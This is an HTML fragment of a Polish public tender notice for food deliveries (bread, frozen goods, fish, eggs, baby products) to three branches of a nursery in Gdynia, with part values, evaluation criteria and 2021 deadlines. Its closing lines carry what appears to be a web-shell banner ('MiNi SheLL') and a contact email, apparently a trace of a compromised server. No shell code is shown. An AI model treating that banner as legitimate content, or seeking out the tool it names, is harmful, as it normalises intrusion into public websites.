class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Procentow</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa pieczywa ( zadanie 5 ) do 3 oddziałów Żłobka Niezapominajka <br/>Przedmiotem zamówienia jest dostawa żywności do Oddziałów Żłobka Niezapominajka w Gdyni,tj. Siedziba Żłobka Niezapominajka ul. Wójta Radtkego 23, Filia Żłobka na Pogórzu ul. Porębskiego 21, Filia Żłobka na Dąbrowie ul. Wiczlińska 33, dostawa zamówień będzie realizowana sukcesywnie według faktycznych potrzeb każdej z placówek na podstawie zamówień złożonych przez przedstawiciela Zamawiającego z dwudniowym wyprzedzeniem do godziny 12.00. Zamawiający przewiduje możliwość składania zamówień pilnych, wynikających z potrzeb Zamawiającego ,a które Wykonawca zobowiązuje się wykonać w danym dniu roboczym. Harmonogram dostawy żywności do oddziałów żłobka : <br/>ZADANIE 1 2-3 razy w tygodniu do godz.7.30, <br/>ZADANIE 2 2-3 razy w tygodniu do godz.7.30,<br/>ZADANIE 3 1 razy w tygodniu godz.12.00, <br/>ZADANIE 4 5 razy w tygodniu godz.6.00,<br/>ZADANIE 5 5 razy w tygodniu godz.6.00,<br/>ZADANIE 6 1 raz w tygodniu do godz.6.00<br/>ZADANIE 7 1 raz w tygodniu do godz.12.00<br/>ZADANIE 8 1 raz w tygodniu do godz.12.00<br/>ZADANIE 9 2-3 razy w tygodniu do godz.7.30 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 11674,70 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa mrożonek ( zadanie 6) do 3 oddziałów Żłobka Niezapominajka <br/>Przedmiotem zamówienia jest dostawa żywności do Oddziałów Żłobka Niezapominajka w Gdyni,tj. Siedziba Żłobka Niezapominajka ul. Wójta Radtkego 23, Filia Żłobka na Pogórzu ul. Porębskiego 21, Filia Żłobka na Dąbrowie ul. Wiczlińska 33, dostawa zamówień będzie realizowana sukcesywnie według faktycznych potrzeb każdej z placówek na podstawie zamówień złożonych przez przedstawiciela Zamawiającego z dwudniowym wyprzedzeniem do godziny 12.00. Zamawiający przewiduje możliwość składania zamówień pilnych, wynikających z potrzeb Zamawiającego ,a które Wykonawca zobowiązuje się wykonać w danym dniu roboczym. Harmonogram dostawy żywności do oddziałów żłobka : <br/>ZADANIE 1 2-3 razy w tygodniu do godz.7.30, <br/>ZADANIE 2 2-3 razy w tygodniu do godz.7.30,<br/>ZADANIE 3 1 razy w tygodniu godz.12.00, <br/>ZADANIE 4 5 razy w tygodniu godz.6.00,<br/>ZADANIE 5 5 razy w tygodniu godz.6.00,<br/>ZADANIE 6 1 raz w tygodniu do godz.6.00<br/>ZADANIE 7 1 raz w tygodniu do godz.12.00<br/>ZADANIE 8 1 raz w tygodniu do godz.12.00<br/>ZADANIE 9 2-3 razy w tygodniu do godz.7.30 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 31986,60 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa ryb ( zadanie 7) do 3 oddziałów Żłobka Niezapominajka <br/>Przedmiotem zamówienia jest dostawa żywności do Oddziałów Żłobka Niezapominajka w Gdyni,tj. Siedziba Żłobka Niezapominajka ul. Wójta Radtkego 23, Filia Żłobka na Pogórzu ul. Porębskiego 21, Filia Żłobka na Dąbrowie ul. Wiczlińska 33, dostawa zamówień będzie realizowana sukcesywnie według faktycznych potrzeb każdej z placówek na podstawie zamówień złożonych przez przedstawiciela Zamawiającego z dwudniowym wyprzedzeniem do godziny 12.00. Zamawiający przewiduje możliwość składania zamówień pilnych, wynikających z potrzeb Zamawiającego ,a które Wykonawca zobowiązuje się wykonać w danym dniu roboczym. Harmonogram dostawy żywności do oddziałów żłobka : <br/>ZADANIE 1 2-3 razy w tygodniu do godz.7.30, <br/>ZADANIE 2 2-3 razy w tygodniu do godz.7.30,<br/>ZADANIE 3 1 razy w tygodniu godz.12.00, <br/>ZADANIE 4 5 razy w tygodniu godz.6.00,<br/>ZADANIE 5 5 razy w tygodniu godz.6.00,<br/>ZADANIE 6 1 raz w tygodniu do godz.6.00<br/>ZADANIE 7 1 raz w tygodniu do godz.12.00<br/>ZADANIE 8 1 raz w tygodniu do godz.12.00<br/>ZADANIE 9 2-3 razy w tygodniu do godz.7.30 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 19130 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa jaj ( zadanie8) do 3 oddziałów Żłobka Niezapominajka <br/>Przedmiotem zamówienia jest dostawa żywności do Oddziałów Żłobka Niezapominajka w Gdyni,tj. Siedziba Żłobka Niezapominajka ul. Wójta Radtkego 23, Filia Żłobka na Pogórzu ul. Porębskiego 21, Filia Żłobka na Dąbrowie ul. Wiczlińska 33, dostawa zamówień będzie realizowana sukcesywnie według faktycznych potrzeb każdej z placówek na podstawie zamówień złożonych przez przedstawiciela Zamawiającego z dwudniowym wyprzedzeniem do godziny 12.00. Zamawiający przewiduje możliwość składania zamówień pilnych, wynikających z potrzeb Zamawiającego ,a które Wykonawca zobowiązuje się wykonać w danym dniu roboczym. Harmonogram dostawy żywności do oddziałów żłobka : <br/>ZADANIE 1 2-3 razy w tygodniu do godz.7.30, <br/>ZADANIE 2 2-3 razy w tygodniu do godz.7.30,<br/>ZADANIE 3 1 razy w tygodniu godz.12.00, <br/>ZADANIE 4 5 razy w tygodniu godz.6.00,<br/>ZADANIE 5 5 razy w tygodniu godz.6.00,<br/>ZADANIE 6 1 raz w tygodniu do godz.6.00<br/>ZADANIE 7 1 raz w tygodniu do godz.12.00<br/>ZADANIE 8 1 raz w tygodniu do godz.12.00<br/>ZADANIE 9 2-3 razy w tygodniu do godz.7.30 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 9567 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 9</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa produktów dla niemowląt ( zadanie 9) do 3 oddziałów Żłobka Niezapominajka <br/>Przedmiotem zamówienia jest dostawa żywności do Oddziałów Żłobka Niezapominajka w Gdyni,tj. Siedziba Żłobka Niezapominajka ul. Wójta Radtkego 23, Filia Żłobka na Pogórzu ul. Porębskiego 21, Filia Żłobka na Dąbrowie ul. Wiczlińska 33, dostawa zamówień będzie realizowana sukcesywnie według faktycznych potrzeb każdej z placówek na podstawie zamówień złożonych przez przedstawiciela Zamawiającego z dwudniowym wyprzedzeniem do godziny 12.00. Zamawiający przewiduje możliwość składania zamówień pilnych, wynikających z potrzeb Zamawiającego ,a które Wykonawca zobowiązuje się wykonać w danym dniu roboczym. Harmonogram dostawy żywności do oddziałów żłobka : <br/>ZADANIE 1 2-3 razy w tygodniu do godz.7.30, <br/>ZADANIE 2 2-3 razy w tygodniu do godz.7.30,<br/>ZADANIE 3 1 razy w tygodniu godz.12.00, <br/>ZADANIE 4 5 razy w tygodniu godz.6.00,<br/>ZADANIE 5 5 razy w tygodniu godz.6.00,<br/>ZADANIE 6 1 raz w tygodniu do godz.6.00<br/>ZADANIE 7 1 raz w tygodniu do godz.12.00<br/>ZADANIE 8 1 raz w tygodniu do godz.12.00<br/>ZADANIE 9 2-3 razy w tygodniu do godz.7.30 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 1484,81 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-14 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Żłobek Niezapominajka ul.Wójta Radtkego 23 Gdynia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-14 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-30</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com